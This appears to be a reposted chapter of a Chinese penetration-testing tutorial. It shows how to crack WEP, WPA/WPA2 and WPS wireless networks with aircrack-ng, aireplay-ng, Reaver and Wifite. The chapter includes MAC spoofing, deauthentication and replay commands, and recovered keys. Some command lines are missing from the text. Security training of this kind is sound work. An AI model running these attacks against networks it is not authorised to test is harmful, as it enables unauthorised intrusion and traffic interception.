无线网络渗透测试-使用Aircrack-ng工具破解无线网络
破解WEP加密的無(wú)線網(wǎng)絡(luò)
Wired Equivalent Privacy或WEP(有線等效加密)協(xié)議是對(duì)在兩臺(tái)設(shè)備間無(wú)線傳輸?shù)臄?shù)據(jù)進(jìn)行加密的方式,用以防止非法用戶竊聽(tīng)或侵入無(wú)線網(wǎng)絡(luò)。不過(guò)密碼分析學(xué)家已經(jīng)找出WEP好幾個(gè)弱點(diǎn),因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i標(biāo)準(zhǔn)(又稱為WPA2)所取代。本小節(jié)將介紹破解WEP加密的無(wú)線網(wǎng)絡(luò)。
使用Aircrack破解使用WEP加密的無(wú)線網(wǎng)絡(luò)。具體操作步驟如下所示。
(1)使用airmon-ng命令查看當(dāng)前系統(tǒng)中的無(wú)線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:
輸出的信息表示,當(dāng)前系統(tǒng)中存在一個(gè)無(wú)線網(wǎng)絡(luò)接口。從輸出結(jié)果的Interface列,可以看到當(dāng)前系統(tǒng)的無(wú)線接口為wlan0。
(2)修改wlan0接口的MAC地址。因?yàn)镸AC地址標(biāo)識(shí)主機(jī)所在的網(wǎng)絡(luò),修改主機(jī)的MAC地址可以隱藏真實(shí)的MAC地址。在修改MAC地址之前,需要停止該接口。執(zhí)行命令如下所示:
或者:
root@kali:~# ifconfig wlan0 down
執(zhí)行以上命令后,wlan0接口則停止。此時(shí)就可以修改MAC地址了,執(zhí)行命令如下 所示:
root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0 Permanent MAC:
00:c1:40:76:05:6c (unknown) Current MAC: 00:c1:40:76:05:6c (unknown)
New MAC: 00:11:22:33:44:55 (Cimsys Inc)
輸出的信息顯示了wlan0接口永久的MAC地址、當(dāng)前的MAC地址及新的MAC地址。可以看到wlan1接口的MAC地址已經(jīng)被修改。
(3)重新啟動(dòng)wlan0。執(zhí)行命令如下所示:
輸出的信息顯示了無(wú)線網(wǎng)卡wlan0的芯片及驅(qū)動(dòng)類(lèi)型。例如,當(dāng)前系統(tǒng)的無(wú)線網(wǎng)卡芯片為Ralink RT2870/3070;默認(rèn)驅(qū)動(dòng)為rt2800usb,并顯示監(jiān)聽(tīng)模式被啟用,映射網(wǎng)絡(luò)接口為mon0。
有時(shí)候使用airmon-ng start wlan0命令啟用無(wú)線網(wǎng)卡時(shí),可能會(huì)出現(xiàn)SIOCSIFFLAGS: Operation not possible due to RF-kill錯(cuò)誤。這是因?yàn)長(zhǎng)inux下有一個(gè)軟件RF-kill,該軟件為了省電會(huì)將不使用的無(wú)線設(shè)備(如WIFI和Buletooth)自動(dòng)關(guān)閉。當(dāng)用戶使用這些設(shè)備時(shí),RF-kill不會(huì)智能的自動(dòng)打開(kāi),需要手動(dòng)解鎖。用戶可以執(zhí)行rfkill list命令查看所有設(shè)備,如下所示:
root@kali:~# rfkill list 0: ideapad_wlan: Wireless LAN Soft blocked:
yes Hard blocked: no 1: phy0: Wireless LAN Soft blocked: yes Hard
blocked: no
該列表中前面的編號(hào),表示的是設(shè)備的索引號(hào)。用戶可以通過(guò)指定索引號(hào),停止或啟用某個(gè)設(shè)備。如啟用所有設(shè)備,執(zhí)行如下所示的命令:
root@kali:~# rfkill unblock all
執(zhí)行以上命令后,沒(méi)有任何信息輸出。以上命令表示,解除所有被關(guān)閉的設(shè)備。
(4)使用airodump命令定位附近所有可用的無(wú)線網(wǎng)絡(luò)。執(zhí)行命令如下所示:
以上輸出的信息顯示了附近所有可用的無(wú)線網(wǎng)絡(luò)。當(dāng)找到用戶想要攻擊的無(wú)線路由器時(shí),按下Ctrl+C鍵停止搜索。
從輸出的信息中看到有很多參數(shù)。詳細(xì)介紹如下所示。
-
BSSID:無(wú)線的IP地址。
-
PWR:網(wǎng)卡報(bào)告的信號(hào)水平。
-
Beacons:無(wú)線發(fā)出的通告編號(hào)。
-
Data:被捕獲到的數(shù)據(jù)分組的數(shù)量,包括廣播分組。
-
/s:過(guò)去10秒鐘內(nèi)每秒捕獲數(shù)據(jù)分組的數(shù)量。
-
CH:信道號(hào)(從Beacons中獲取)。
-
MB:無(wú)線所支持的最大速率。如果MB=11,它是802.11b;如
-
果MB=22,它是802.11b+;如果更高就是802.11g。后面的點(diǎn)(高于54之后)表明支持短前導(dǎo)碼。
-
ENC:使用的加密算法體系。OPN表示無(wú)加密。 - WEP?表示W(wǎng)EP或者WPA/WPA2模式,WEP(沒(méi)有問(wèn)號(hào))表示靜態(tài)或動(dòng)態(tài)WEP。如果出現(xiàn)TKIP或CCMP,那么就是WPA/WPA2。
-
CIPHER:檢測(cè)到的加密算法,是CCMP、WRAAP、TKIP、WEP和WEP104中的一個(gè)。典型的來(lái)說(shuō)(不一定),TKIP與WPA結(jié)合使用,CCMP與WPA2結(jié)合使用。如果密鑰索引值大于0,顯示為WEP40。標(biāo)準(zhǔn)情況下,索引0-3是40bit,104bit應(yīng)該是0。
-
AUTH:使用的認(rèn)證協(xié)議。常用的有MGT(WPA/WPA2使用獨(dú)立的認(rèn)證服務(wù)器,平時(shí)我們常說(shuō)的802.1x、radius和eap等)、SKA(WEP的共享密鑰)、PSK(WPA/WPA2的預(yù)共享密鑰)或者OPN(WEP開(kāi)放式)。
-
ESSID:指所謂的SSID號(hào)。如果啟用隱藏的SSID的話,它可以為空。這種情況下,airodump-ng試圖從proberesponses和associationrequests中獲取SSID。
-
STATION:客戶端的MAC地址,包括連上的和想要搜索無(wú)線來(lái)連接的客戶端。如果客戶端沒(méi)有連接上,就在BSSID下顯示“notassociated”。
-
Rate:表示傳輸率。
-
Lost:在過(guò)去10秒鐘內(nèi)丟失的數(shù)據(jù)分組,基于序列號(hào)檢測(cè)。它意味著從客戶端來(lái)的數(shù)據(jù)丟包,每個(gè)非管理幀中都有一個(gè)序列號(hào)字段,把剛接收到的那個(gè)幀中的序列號(hào)和前一個(gè)幀中的序列號(hào)一減就能知道丟了幾個(gè)包。
-
Frames:客戶端發(fā)送的數(shù)據(jù)分組數(shù)量。
-
Probe:被客戶端查探的ESSID。如果客戶端正試圖連接一個(gè)無(wú)線,但是沒(méi)有連接上,那么就顯示在這里。
(5)使用airodump-ng捕獲指定BSSID的文件。執(zhí)行命令如下所示。
airodump-ng命令常用的選項(xiàng)如下所示。
- -c:指定選擇的頻道。
- -w:指定一個(gè)文件名,用于保存捕獲的數(shù)據(jù)。
- -bssid:指定攻擊的BSSID。
下面將Bssid為14:E6:E4:AC:FB:20的無(wú)線路由器作為攻擊目標(biāo)。執(zhí)行命令如下所示:
從輸出的信息中可以看到ESSID為T(mén)est無(wú)線路由器的#Data一直在變化,表示有客戶端正與無(wú)線發(fā)生數(shù)據(jù)交換。以上命令執(zhí)行成功后,會(huì)生成一個(gè)名為wirelessattack-01.ivs的文件,而不是wirelessattack.ivs。這是因?yàn)閍irodump-ng工具為了方便后面破解的時(shí)候調(diào)用,所有對(duì)保存文件按順序編了號(hào),于是就多了-01這樣的序號(hào),以此類(lèi)推。在進(jìn)行第二次攻擊時(shí),若使用同樣文件名wirelessattack保存的話,就會(huì)生成名為wirelessattack-02.ivs文件。
(6)打開(kāi)一個(gè)新的終端窗口,運(yùn)行aireplay命令。aireplay命令的語(yǔ)法格式如下所示:
aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID]
[Interface] aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC
address] [Interface]
啟動(dòng)aireplay,執(zhí)行命令如下所示:
root@kali:~# aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h
00:11:22:33:44:55 -e Test mon0 The interface MAC (00:C1:40:76:05:6C)
doesn’t match the specified MAC (-h). ifconfig mon0 hw ether
00:11:22:33:44:55 17:25:17 Waiting for beacon frame (BSSID:
14:E6:E4:AC:FB:20) on channel 1 17:25:17 Sending Authentication
Request (Open System) [ACK] 17:25:17 Switching to shared key
authentication 17:25:19 Sending Authentication Request (Shared Key)
[ACK] 17:25:19 Switching to shared key authentication 17:25:21 Sending
Authentication Request (Shared Key) [ACK] 17:25:21 Switching to shared
key authentication 17:25:23 Sending Authentication Request (Shared
Key) [ACK] 17:25:23 Switching to shared key authentication 17:25:25
Sending Authentication Request (Shared Key) [ACK] 17:25:25 Switching
to shared key authentication 17:25:27 Sending Authentication Request
(Shared Key) [ACK] 17:25:27 Switching to shared key authentication
17:25:29 Sending Authentication Request (Shared Key) [ACK] 17:25:29
Switching to shared key authentication
(7)使用aireplay發(fā)送一些流量給無(wú)線路由器,以至于能夠捕獲到數(shù)據(jù)。語(yǔ)法格式如下所示:
aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]
執(zhí)行命令如下所示:
root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55
mon0 The interface MAC (00:C1:40:76:05:6C) doesn’t match the specified
MAC (-h). ifconfig mon0 hw ether 00:11:22:33:44:55 17:26:54 Waiting
for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1 Saving ARP
requests in replay_arp-0515-172654.cap You should also start
airodump-ng to capture replies. Notice: got a deauth/disassoc packet.
Is the source MAC associated ? Read 1259 packets (got 1 ARP requests
and 189 ACKs), sent 198 packets…(499 pps Read 1547 packets (got 1 ARP
requests and 235 ACKs), sent 248 packets…(499 pps Read 1843 packets
(got 1 ARP requests and 285 ACKs), sent 298 packets…(499 pps Read 2150
packets (got 1 ARP requests and 333 ACKs), sent 348 packets…(499 pps
Read 2446 packets (got 1 ARP requests and 381 ACKs), sent 398
packets…(499 pps Read 2753 packets (got 1 ARP requests and 430 ACKs),
sent 449 packets…(500 pps Read 3058 packets (got 1 ARP requests and
476 ACKs), sent 499 packets…(500 pps Read 3367 packets (got 1 ARP
requests and 525 ACKs), sent 548 packets…(499 pps Read 3687 packets
(got 1 ARP requests and 576 ACKs), sent 598 packets…(499 pps Read 4001
packets (got 1 ARP requests and 626 ACKs), sent 649 packets…(500 pps
Read 4312 packets (got 1 ARP requests and 674 ACKs), sent 699
packets…(500 pps Read 4622 packets (got 1 ARP requests and 719 ACKs),
sent 749 packets…(500 pps Read 4929 packets (got 1 ARP requests and
768 ACKs), sent 798 packets…(499 pps Read 5239 packets (got 1 ARP
requests and 817 ACKs), sent 848 packets…(499 pps
輸出的信息就是使用ARP Requests的方式來(lái)讀取ARP請(qǐng)求報(bào)文的過(guò)程,此時(shí)回到airodump-ng界面查看,可以看到Test的Frames欄的數(shù)字在飛速的遞增。在抓取的無(wú)線數(shù)據(jù)報(bào)文達(dá)到了一定數(shù)量后,一般都是指IVsX值達(dá)到2萬(wàn)以上時(shí),就可以開(kāi)始破解,若不能成功就等待數(shù)據(jù)包文繼續(xù)抓取,然后多嘗試幾次。
(8)使用Aircrack破解密碼。執(zhí)行命令如下所示:
從輸出的結(jié)果中可以看到KEY FOUND,表示密碼已經(jīng)找到,為abcde。
破解WPA/WPA2無(wú)線網(wǎng)絡(luò)
WPA全名為Wi-Fi Protected Access,有WPA和WPA2兩個(gè)標(biāo)準(zhǔn)。它是一種保護(hù)無(wú)線電腦網(wǎng)絡(luò)安全的協(xié)議。對(duì)于啟用WPA/WPA2加密的無(wú)線網(wǎng)絡(luò),其攻擊和破解步驟及攻擊是完全一樣的。不同的是,在使用airodump-ng進(jìn)行無(wú)線探測(cè)的界面上,會(huì)提示為WPA CCMP PSK。當(dāng)使用aireplay-ng進(jìn)行攻擊后,同樣獲取到WPA握手?jǐn)?shù)據(jù)包及提示;在破解時(shí)需要提供一個(gè)密碼字典。下面將介紹破解WPA/WPA2無(wú)線網(wǎng)絡(luò)的方法。
使用aircrack-ng破解WPA/WPA2無(wú)線網(wǎng)絡(luò)的具體操作步驟如下所示。
(1)查看無(wú)線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:
(2)停止無(wú)線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:
(3)修改無(wú)線網(wǎng)卡MAC地址。執(zhí)行命令如下所示:
root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0 Permanent MAC:
00:c1:40:76:05:6c (unknown) Current MAC: 00:c1:40:76:05:6c (unknown)
New MAC: 00:11:22:33:44:55 (Cimsys Inc)
(4)啟用無(wú)線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:
(5)捕獲數(shù)據(jù)包。執(zhí)行命令如下所示:
(6)對(duì)無(wú)線路由器Test進(jìn)行Deauth攻擊。執(zhí)行命令如下所示:
root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c
00:11:22:33: 44:55 mon0 17:50:27 Waiting for beacon frame (BSSID:
14:E6:E4:AC:FB:20) on channel 1 17:50:30 Sending 64 directed DeAuth.
STMAC: [00:11:22:33:44:55] [12|59 ACKs]
(7)破解密碼。執(zhí)行命令如下所示:
從輸出的信息中可以看到無(wú)線路由器的密碼已經(jīng)成功破解。在KEY FOUND提示的右側(cè)可以看到密碼已被破解出,為daxueba,破解速度約為500.88 k/s。
攻擊WPS(Wi-Fi Proteced Setup)
WPS是由Wi-Fi聯(lián)盟所推出的全新Wi-Fi安全防護(hù)設(shè)定標(biāo)準(zhǔn)。該標(biāo)準(zhǔn)主要是為了解決無(wú)線網(wǎng)絡(luò)加密認(rèn)證設(shè)定的步驟過(guò)于繁雜的弊病。因?yàn)橥ǔS脩敉鶗?huì)因?yàn)樵O(shè)置步驟太麻煩,以至于不做任何加密安全設(shè)定,從而引起許多安全上的問(wèn)題。所以很多人使用WPS設(shè)置無(wú)線設(shè)備,可以通過(guò)個(gè)人識(shí)別碼(PIN)或按鈕(PBC)取代輸入一個(gè)很長(zhǎng)的密碼短語(yǔ)。當(dāng)開(kāi)啟該功能后,攻擊者就可以使用暴力攻擊的方法來(lái)攻擊WPS。本小節(jié)將介紹使用各種工具攻擊WPS。
現(xiàn)在大部分路由器上都支持WPS功能。以前路由器有專(zhuān)門(mén)的WPS設(shè)置,現(xiàn)在的路由器使用QSS功能取代了。這里以TP-LINK型號(hào)為例,介紹設(shè)置WPS功能,如圖9.15所示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按鈕就可以了。
圖9.15 設(shè)置WPS
從該界面可以看到QSS功能已開(kāi)啟,可以看到當(dāng)前的PIN碼是04588306。這里可以重新生成新的PIN碼,或者恢復(fù)初始PIN碼。
【實(shí)例9-1】使用Reaver破解WPS。具體操作步驟如下所示。
(1)插入無(wú)線網(wǎng)卡,使用ifconfig命令查看無(wú)線網(wǎng)卡是否已經(jīng)正確插入。執(zhí)行命令如下所示:
root@Kali:~# ifconfig eth0 Link encap:Ethernet HWaddr
00:19:21:3f:c3:e5
inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0
inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:10541 errors:0 dropped:0 overruns:0 frame:0
TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB) lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:296 errors:0 dropped:0 overruns:0 frame:0
TX packets:296 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB)
從輸出的信息中可以看到,只有一個(gè)以太網(wǎng)接口eth0。這是因?yàn)闊o(wú)線網(wǎng)卡可能沒(méi)有啟動(dòng),首先來(lái)啟動(dòng)該無(wú)線網(wǎng)卡。執(zhí)行命令如下所示:
root@Kali:~# ifconfig wlan0 up
執(zhí)行以上命令后,沒(méi)有任何信息輸出。此時(shí)再次執(zhí)行ifconfig命令,查看無(wú)線網(wǎng)絡(luò)是否已啟動(dòng),如下所示:
root@Kali:~# ifconfig … wlan0 Link encap:Ethernet HWaddr
08:10:76:49:c3:cd
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
看到以上輸出信息,則表示無(wú)線網(wǎng)卡已成功啟動(dòng),其網(wǎng)絡(luò)接口為wlan0。
(2)啟動(dòng)無(wú)線網(wǎng)卡為監(jiān)聽(tīng)模式。執(zhí)行命令如下所示:
輸出的信息中,可以看到monitor mode enabled on mon0,表示無(wú)線網(wǎng)卡已啟動(dòng)監(jiān)聽(tīng)模式。在以上信息中,還可以看到無(wú)線網(wǎng)卡的芯片級(jí)驅(qū)動(dòng)類(lèi)型。其中,該網(wǎng)卡的芯片為Ralink,默認(rèn)驅(qū)動(dòng)為rt2800usb。
291-02注意:執(zhí)行以上命令啟動(dòng)監(jiān)聽(tīng)模式,一定要確定正確識(shí)別無(wú)線網(wǎng)卡的芯片和驅(qū)動(dòng)。否則,該無(wú)線網(wǎng)卡可能導(dǎo)致攻擊失敗。
(3)攻擊WPS。執(zhí)行命令如下所示:
root@kali:~# reaver -i mon0 -b 14:E6:E4:AC:FB:20 -vv Reaver v1.4 WiFi
Protected Setup Attack Tool Copyright ? 2011, Tactical Network
Solutions, Craig Heffner <cheffner@ tacnetsol.com> [+] Waiting for
beacon from 14:E6:E4:AC:FB:20 [+] Switching mon0 to channel 1 [+]
Switching mon0 to channel 2 [+] Switching mon0 to channel 3 [+]
Switching mon0 to channel 11 [+] Switching mon0 to channel 4 [+]
Switching mon0 to channel 5 [+] Switching mon0 to channel 6 [+]
Switching mon0 to channel 7 [+] Associated with 8C:21:0A:44:09:F8
(ESSID: yztxty) [+] Trying pin 12345670 [+] Sending EAPOL START
request [+] Received identity request [+] Sending identity response
[+] Received identity request [+] Sending identity response [+]
Received M1 message [+] Sending M2 message [+] Received M3 message [+]
Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK …
從以上輸出信息中,可以看到正在等待連接到14:E6:E4:AC:FB:20無(wú)線路由器的信號(hào)。并且通過(guò)發(fā)送PIN信息,獲取密碼。
如果沒(méi)有路由器沒(méi)有開(kāi)啟WPS的話,將會(huì)出現(xiàn)如下所示的信息:
[!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX)
Fern WiFi Cracker是一個(gè)非常不錯(cuò)的工具,用來(lái)測(cè)試無(wú)線網(wǎng)絡(luò)安全。后面將會(huì)介紹使用該工具,攻擊Wi-Fi網(wǎng)絡(luò)。這里首先介紹使用Fern WiFi Cracker工具來(lái)攻擊WPS。
【實(shí)例9-2】使用Wifite攻擊WPS。具體操作步驟如下所示。
(1)啟動(dòng)Wifite工具,并指定使用common.txt密碼字典。在命令行終端執(zhí)行如下所示的命令:
root@kali:~# wifite -dict common.txt
執(zhí)行以上命令后,將顯示如下所示的信息:
以上信息顯示了WiFite工具的版本信息,支持平臺(tái),并且開(kāi)始掃描無(wú)線網(wǎng)絡(luò)。當(dāng)掃描到想要破解的無(wú)線網(wǎng)絡(luò)時(shí),按下CTRL+C組合鍵停止掃描。
(2)停止掃描無(wú)線網(wǎng)絡(luò),將顯示如下所示的信息:
從以上輸出信息中,可以看到掃描到五個(gè)無(wú)線接入點(diǎn)和三個(gè)客戶端。在輸出信息中,共顯示了7列。分別表示無(wú)線接入點(diǎn)編號(hào)、ESSID號(hào)、信道、加密方式、電功率、是否開(kāi)啟wps和客戶端。如果僅有一個(gè)客戶端連接到無(wú)線接入點(diǎn),則CLIENT列顯示是client。如果有多個(gè)客戶端連接的話,則顯示是clients。
(3)此時(shí),選擇要攻擊的無(wú)線接入點(diǎn)。這里選擇第五個(gè)無(wú)線接入點(diǎn),輸入“1”。然后按下回車(chē)鍵將開(kāi)始攻擊,顯示信息如下所示:
[+] select target numbers (1-5) separated by commas, or ‘a(chǎn)ll’: 1 [+] 1
target selected. [0:00:00] initializing WPS PIN attack on yzty
(EC:17:2F:46:70:BA) [0:11:00] WPS attack, 0/0 success/ttl, [!]
unable to complete successful try in 660 seconds [+] skipping yzty
[0:08:20] starting wpa handshake capture on “yzty” [0:08:11] new
client found: 18:DC:56:F0:62:AF [0:08:09] listening for handshake…
[0:00:11] handshake captured! saved as “hs/yzty_EC-17-2F-46-70-BA.cap”
[+] 2 attacks completed: [+] 1/2 WPA attacks succeeded
yzty (EC:17:2F:46:70:BA) handshake captured
saved as hs/yzty_EC-17-2F-46-70-BA.cap [+] starting WPA cracker on 1 handshake [0:00:00] cracking yzty with aircrack-ng [+]
cracked yzty (EC:17:2F:46:70:BA)! [+] key: “huolong5” [+] quitting
從輸出的信息中,可以看到破解出yzty無(wú)線設(shè)備的密碼為huolong5。
總結(jié)
以上是生活随笔為你收集整理的无线网络渗透测试-使用Aircrack-ng工具破解无线网络的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 带你了解无线网络渗透测试——无线网络嗅探
- 下一篇: 无线网络渗透测试-Gerix Wifi